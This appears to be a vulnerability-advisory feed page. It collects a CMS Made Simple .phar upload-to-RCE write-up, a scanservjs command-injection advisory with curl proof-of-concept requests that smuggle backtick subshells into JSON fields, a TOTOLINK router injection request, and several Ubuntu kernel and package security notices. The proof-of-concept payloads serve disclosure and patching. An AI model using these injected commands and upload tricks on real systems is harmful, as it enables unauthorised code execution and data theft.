File upload vulnerability in CMS Made Simple through 2.2.15 allows remote authenticated attackers to gain a webshell via a crafted phar file.

**File upload bypass with .phar extension lead to RCE****Author: Riccardo Krauter @ Soter IT Security ****Summary**

The vulnerability affect the FilePicker module, it is possible to bypass the restriction and upload a malicious file with .phar extension to gain Remote Code Execution

**Steps to reproduce the issue**

Prepare a PoC file with .phar extension with arbitrary php code in it.

Login into the admin area and surf to the MicroTiny WYSIWYG editor functionality then click on the **insert/edit image** button. The screenshot below shows this steps.

A new window will be opened, now click on the search button, the CMSMS File Picker will be shown.

Now the FilePicker module will be used. Click on the upload button.

Select the .phar malicious file.

The file should be uploaded.

Surf to the .phar file to gain RCE.

The exploit is working because the upload handler checks only if the extension contains the php string (obviously phar does not match). The exploit works fine on a standard Ubuntu system, here the configuration used for the tests:

*   Linux ubuntu 5.4.0-58-generic
*   php version 7.4.3
*   Apache/2.4.41 (Ubuntu)
*   File Picker version = "1.0.5"

CVE-2021-28998: CVE/File_upload_to_RCE.md at master · beerpwn/CVE

OS Command Injection in GitHub repository sbs20/scanservjs prior to v2.27.0.



**Description**

Scanservjs has a RESTful API that provides endpoints for interacting with scanners using the SANE library. There are two APIs for scanning an image and generating a preview image that call out to Process.spawn, invoking a scanimage command as a subprocess of the server, and passing arguments from the API request body as arguments into the subprocess. Both APIs suffer from OS Command Injection via type confusion in several parameters in the POST body. While the business logic does sanitize string parameters from these API calls, it doesn't sufficiently prevent arrays of strings from being passed in several vulnerable POST body parameters. This allows an attacker to pass a JSON array with a single string parameter, buffeted by backticks, which gets formatted as a string and placed in the arguments for scanimage. This ultimately executes a subshell with an arbitrary command passed by the attacker, leading to remote code execution. While scanservjs has the option to enable HTTP Basic Auth, it is hidden in the config and there is no documentation on this feature, therefore this is a remote code execution without authentication by default.

**Proof of Concept****POST /scan Proof of Concept**

Request:

    curl --request POST \
      --url http://localhost:8080/scan \
      --header 'Content-Type: application/json' \
      --data '{"version":"2.26.1","params":{"deviceId":"pixma:MP620_10.64.0.25","resolution":["`cat /etc/os-release 1>&2`"],"width":216,"height":297,"left":0,"top":0,"mode":"Color","source":"Flatbed"},"filters":[],"pipeline":"JPG | @:pipeline.high-quality","batch":"none","index":1}'
    

Response:

    {
        "message": "/usr/bin/scanimage -d pixma:MP620_10.64.0.25 --source Flatbed --mode Color --resolution `cat /etc/os-release 1>&2` -l 0 -t 0 -x 216 -y 297 --format tiff -o data/temp/~tmp-scan-0-0001.tif exited with code: 1, stderr: PRETTY_NAME=\"Ubuntu 22.10\"\nNAME=\"Ubuntu\"\nVERSION_ID=\"22.10\"\nVERSION=\"22.10 (Kinetic Kudu)\"\nVERSION_CODENAME=kinetic\nID=ubuntu\nID_LIKE=debian\nHOME_URL=\"https://www.ubuntu.com/\"\nSUPPORT_URL=\"https://help.ubuntu.com/\"\nBUG_REPORT_URL=\"https://bugs.launchpad.net/ubuntu/\"\nPRIVACY_POLICY_URL=\"https://www.ubuntu.com/legal/terms-and-policies/privacy-policy\"\nUBUNTU_CODENAME=kinetic\nLOGO=ubuntu-logo\nscanimage: open of device pixma:MP620_10.64.0.25 failed: Invalid argument\n",
        "code": -1
    }
    

**Proof of Concept****POST /preview Proof of Concept**

Request:

    curl --request POST \
      --url http://localhost:8080/preview \
      --header 'Content-Type: application/json' \
      --data '{"version":"2.26.1","params":{"deviceId":"pixma:MP620_10.64.0.25","resolution":100,"width":216,"height":297,"left":0,"top":0,"mode":"Color","source":"Flatbed", "contrast": ["`cat /etc/os-release 1>&2`"]},"filters":[],"pipeline":"JPG | @:pipeline.high-quality","batch":"none","index":1}'
    

Response:

    {
        "message": "/usr/bin/scanimage -d pixma:MP620_10.64.0.25 --source Flatbed --mode Color --resolution 100 -l 0 -t 0 -x 216 -y 297 --format tiff --contrast `cat /etc/os-release 1>&2` -o data/preview/preview.tif exited with code: 1, stderr: PRETTY_NAME=\"Ubuntu 22.10\"\nNAME=\"Ubuntu\"\nVERSION_ID=\"22.10\"\nVERSION=\"22.10 (Kinetic Kudu)\"\nVERSION_CODENAME=kinetic\nID=ubuntu\nID_LIKE=debian\nHOME_URL=\"https://www.ubuntu.com/\"\nSUPPORT_URL=\"https://help.ubuntu.com/\"\nBUG_REPORT_URL=\"https://bugs.launchpad.net/ubuntu/\"\nPRIVACY_POLICY_URL=\"https://www.ubuntu.com/legal/terms-and-policies/privacy-policy\"\nUBUNTU_CODENAME=kinetic\nLOGO=ubuntu-logo\nscanimage: open of device pixma:MP620_10.64.0.25 failed: Invalid argument\n",
        "code": -1
    }
    

**Impact**

The vulnerability can execute any process on the server using a subshell, so the compromise of the system running scanservjs is almost complete. This vulnerability enables an attacker to dump the contents of any file on the server that the user, or the user's group, associated with the scanservjs process has permissions to read. Exfiltrating data can be done by using code execution in a subshell and redirecting output of a cat like command to stderr. An attacker can do more than query data using the subshell, and can run commands to write data to the server, and execute other processes outside the scope of scanservjs. In the default case, scanservjs is setup with a dedicated non root user so this user cannot read files, write files or execute commands as root. In the worst case, an administrator sets up scanservjs to run as a user with root permissions.

**Occurrences**

command-builder.js L18

The vulnerability occurs in the following code when the parameters passed from the API are formatted and sanitized. String parameters are sanitized and surrounded with single quotes but array type parameters, which can be passed to this function, are not sanitized or quoted. They are then formatted to a string when calling return `${value}`.

      /**
       * @param {string|number} [value]
       * @returns {string}
       */
      _format(value) {
        if (typeof value === 'string') {
          if (value.includes('\'')) {
            throw Error('Argument must not contain single quote "\'"');
          } else if (['$', ' ', '#', '\\', ';'].some(c => value.includes(c))) {
            return `'${value}'`;
          }
        }
        return `${value}`;
      }

CVE-2023-2564: OS Command Injection via Type Confusion in Scan and Preview Parameters in scanservjs

Ubuntu Security Notice 6058-1 - It was discovered that the Traffic-Control Index implementation in the Linux kernel did not properly perform filter deactivation in some situations. A local attacker could possibly use this to gain elevated privileges.

    ==========================================================================Ubuntu Security Notice USN-6058-1May 05, 2023linux-aws, linux-aws-hwe vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTS- Ubuntu 16.04 ESMSummary:The system could be made to run programs as an administrator.Software Description:- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-aws-hwe: Linux kernel for Amazon Web Services (AWS-HWE) systemsDetails:It was discovered that the Traffic-Control Index (TCINDEX) implementationin the Linux kernel did not properly perform filter deactivation in somesituations. A local attacker could possibly use this to gain elevatedprivileges. Please note that with the fix for this CVE, kernel support forthe TCINDEX classifier has been removed.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS:   linux-image-4.15.0-1155-aws     4.15.0-1155.168   linux-image-aws-lts-18.04       4.15.0.1155.153Ubuntu 16.04 ESM:   linux-image-4.15.0-1155-aws     4.15.0-1155.168~16.04.1   linux-image-aws-hwe             4.15.0.1155.138After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6058-1   CVE-2023-1829Package Information:   https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1155.168

Ubuntu Security Notice USN-6058-1

Ubuntu Security Notice 6057-1 - It was discovered that the Traffic-Control Index implementation in the Linux kernel contained a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the OverlayFS implementation in the Linux kernel did not properly handle copy up operation in some conditions. A local attacker could possibly use this to gain elevated privileges.

==========================================================================  
Ubuntu Security Notice USN-6057-1  
May 05, 2023

linux-intel-iotg vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-intel-iotg: Linux kernel for Intel IoT platforms

Details:

It was discovered that the Traffic-Control Index (TCINDEX) implementation  
in the Linux kernel contained a use-after-free vulnerability. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2023-1281)

It was discovered that the OverlayFS implementation in the Linux kernel did  
not properly handle copy up operation in some conditions. A local attacker  
could possibly use this to gain elevated privileges. (CVE-2023-0386)

Haowei Yan discovered that a race condition existed in the Layer 2  
Tunneling Protocol (L2TP) implementation in the Linux kernel. A local  
attacker could possibly use this to cause a denial of service (system  
crash). (CVE-2022-4129)

It was discovered that the network queuing discipline implementation in the  
Linux kernel contained a null pointer dereference in some situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2022-47929)

It was discovered that the NTFS file system implementation in the Linux  
kernel contained a null pointer dereference in some situations. A local  
attacker could use this to cause a denial of service (system crash).  
(CVE-2022-4842)

Kyle Zeng discovered that the IPv6 implementation in the Linux kernel  
contained a NULL pointer dereference vulnerability in certain situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2023-0394)

It was discovered that the Human Interface Device (HID) support driver in  
the Linux kernel contained a type confusion vulnerability in some  
situations. A local attacker could use this to cause a denial of service  
(system crash). (CVE-2023-1073)

It was discovered that a memory leak existed in the SCTP protocol  
implementation in the Linux kernel. A local attacker could use this to  
cause a denial of service (memory exhaustion). (CVE-2023-1074)

It was discovered that the NFS implementation in the Linux kernel did not  
properly handle pending tasks in some situations. A local attacker could  
use this to cause a denial of service (system crash) or expose sensitive  
information (kernel memory). (CVE-2023-1652)

Lianhui Tang discovered that the MPLS implementation in the Linux kernel  
did not properly handle certain sysctl allocation failure conditions,  
leading to a double-free vulnerability. An attacker could use this to cause  
a denial of service or possibly execute arbitrary code. (CVE-2023-26545)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.15.0-1028-intel-iotg  5.15.0-1028.33  
   linux-image-intel-iotg          5.15.0.1028.27

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6057-1  
   CVE-2022-4129, CVE-2022-47929, CVE-2022-4842, CVE-2023-0386,  
   CVE-2023-0394, CVE-2023-1073, CVE-2023-1074, CVE-2023-1281,  
   CVE-2023-1652, CVE-2023-26545

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-intel-iotg/5.15.0-1028.33

Ubuntu Security Notice USN-6057-1

Ubuntu Security Notice 6056-1 - It was discovered that a race condition existed in the Xen transport layer implementation for the 9P file system protocol in the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or expose sensitive information.

    ==========================================================================Ubuntu Security Notice USN-6056-1May 05, 2023linux-oem-6.1 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:The guest VM system could be made to crash or expose sensitive information.Software Description:- linux-oem-6.1: Linux kernel for OEM systemsDetails:It was discovered that a race condition existed in the Xen transport layerimplementation for the 9P file system protocol in the Linux kernel, leadingto a use-after-free vulnerability. A local attacker could use this to causea denial of service (guest crash) or expose sensitive information (guestkernel memory).Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-6.1.0-1010-oem      6.1.0-1010.10   linux-image-oem-22.04c          6.1.0.1010.10After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6056-1   CVE-2023-1859Package Information:   https://launchpad.net/ubuntu/+source/linux-oem-6.1/6.1.0-1010.10

Ubuntu Security Notice USN-6056-1

TOTOLINK X5000R V9.1.0u.6118_B20201102 and V9.1.0u.6369_B20230113 contain a command insertion vulnerability in setting/setTracerouteCfg. This vulnerability allows an attacker to execute arbitrary commands through the "command" parameter.

TOTOLINK X5000R (V9.1.0u.6369\_B20230113)was found to contain a command insertion vulnerability in setting/setTracerouteCfg.This vulnerability allows an attacker to execute arbitrary commands through the "command" parameter.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.3.2
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 82
    Origin: http://192.168.3.2
    Connection: close
    Referer: http://192.168.3.2/advance/traceroute.html?time=1679125513355
    Cookie: SESSION_ID=2:1679122532:2
    
    {"command":"127.0.0.1; pwd > /tmp/1.txt;","num":"4","topicurl":"setTracerouteCfg"}
    

Finally, you can write exp to get a stable root shell without authorization.

CVE-2023-30013: vuln/TOTOLINK/X5000R/2 at main · Kazamayc/vuln

Ubuntu Security Notice 6055-1 - It was discovered that Ruby incorrectly handled certain regular expressions. An attacker could possibly use this issue to cause a denial of service. It was discovered that Ruby incorrectly handled certain regular expressions. An attacker could possibly use this issue to cause a denial of service. This issue is being addressed only for Ubuntu 18.04 LTS and Ubuntu 20.04 LTS.

==========================================================================  
Ubuntu Security Notice USN-6055-1  
May 04, 2023

ruby2.3, ruby2.5, ruby2.7 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 ESM

Summary:

Several security issues were fixed in Ruby.

Software Description:  
- ruby2.7: Object-oriented scripting language  
- ruby2.5: Object-oriented scripting language  
- ruby2.3: Object-oriented scripting language

Details:

It was discovered that Ruby incorrectly handled certain regular expressions.  
An attacker could possibly use this issue to cause a denial of service.  
(CVE-2023-28755)

It was discovered that Ruby incorrectly handled certain regular expressions.  
An attacker could possibly use this issue to cause a denial of service.  
This issue is being addressed only for Ubuntu 18.04 LTS and Ubuntu 20.04 LTS.  
(CVE-2023-28756)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
  libruby2.7                      2.7.0-5ubuntu1.9  
  ruby2.7                         2.7.0-5ubuntu1.9

Ubuntu 18.04 LTS:  
  libruby2.5                      2.5.1-1ubuntu1.14  
  ruby2.5                         2.5.1-1ubuntu1.14

Ubuntu 16.04 ESM:  
  libruby2.3                      2.3.1-2~ubuntu16.04.16+esm5  
  ruby2.3                         2.3.1-2~ubuntu16.04.16+esm5

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6055-1  
  CVE-2023-28755, CVE-2023-28756

Package Information:  
  https://launchpad.net/ubuntu/+source/ruby2.7/2.7.0-5ubuntu1.9  
  https://launchpad.net/ubuntu/+source/ruby2.5/2.5.1-1ubuntu1.14

Ubuntu Security Notice USN-6055-1

Ubuntu Security Notice 6054-1 - Moataz Al-Sharida and nawaik discovered that Django incorrectly handled uploading multiple files using one form field. A remote attacker could possibly use this issue to bypass certain validations.

==========================================================================  
Ubuntu Security Notice USN-6054-1  
May 03, 2023

python-django vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

A Django hardening measure could be bypassed.

Software Description:  
- python-django: High-level Python web development framework

Details:

Moataz Al-Sharida and nawaik discovered that Django incorrectly handled  
uploading multiple files using one form field. A remote attacker could  
possibly use this issue to bypass certain validations.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   python3-django                  3:3.2.18-1ubuntu0.1

Ubuntu 22.10:  
   python3-django                  3:3.2.15-1ubuntu1.3

Ubuntu 22.04 LTS:  
   python3-django                  2:3.2.12-2ubuntu1.6

Ubuntu 20.04 LTS:  
   python3-django                  2:2.2.12-1ubuntu0.17

Ubuntu 18.04 LTS:  
   python-django                   1:1.11.11-1ubuntu1.21  
   python3-django                  1:1.11.11-1ubuntu1.21

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6054-1  
   CVE-2023-31047

Package Information:  
   https://launchpad.net/ubuntu/+source/python-django/3:3.2.18-1ubuntu0.1  
   https://launchpad.net/ubuntu/+source/python-django/3:3.2.15-1ubuntu1.3  
   https://launchpad.net/ubuntu/+source/python-django/2:3.2.12-2ubuntu1.6  
   https://launchpad.net/ubuntu/+source/python-django/2:2.2.12-1ubuntu0.17  
   https://launchpad.net/ubuntu/+source/python-django/1:1.11.11-1ubuntu1.21

Ubuntu Security Notice USN-6054-1

The Databricks Platform as of 2023-01-26 suffered from a cluster isolation bypass vulnerability through insecure defaults and shared storage.

Databricks Platform Cluster Isolation Bypass

Ubuntu Security Notice 6053-1 - It was discovered that PHP incorrectly handled certain invalid Blowfish password hashes. An invalid password hash could possibly allow applications to accept any password as valid, contrary to expectations.

    ==========================================================================Ubuntu Security Notice USN-6053-1May 02, 2023php7.0 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESMSummary:PHP could be made to bypass password checking if a specially crafted input wasprovided.Software Description:- php7.0: HTML-embedded scripting language interpreterDetails:It was discovered that PHP incorrectly handled certain invalid Blowfishpassword hashes. An invalid password hash could possibly allow applications toaccept any password as valid, contrary to expectations.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:   libapache2-mod-php7.0           7.0.33-0ubuntu0.16.04.16+esm6   php7.0                          7.0.33-0ubuntu0.16.04.16+esm6   php7.0-cgi                      7.0.33-0ubuntu0.16.04.16+esm6   php7.0-cli                      7.0.33-0ubuntu0.16.04.16+esm6   php7.0-fpm                      7.0.33-0ubuntu0.16.04.16+esm6In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6053-1   CVE-2023-0567

Tag

#ubuntu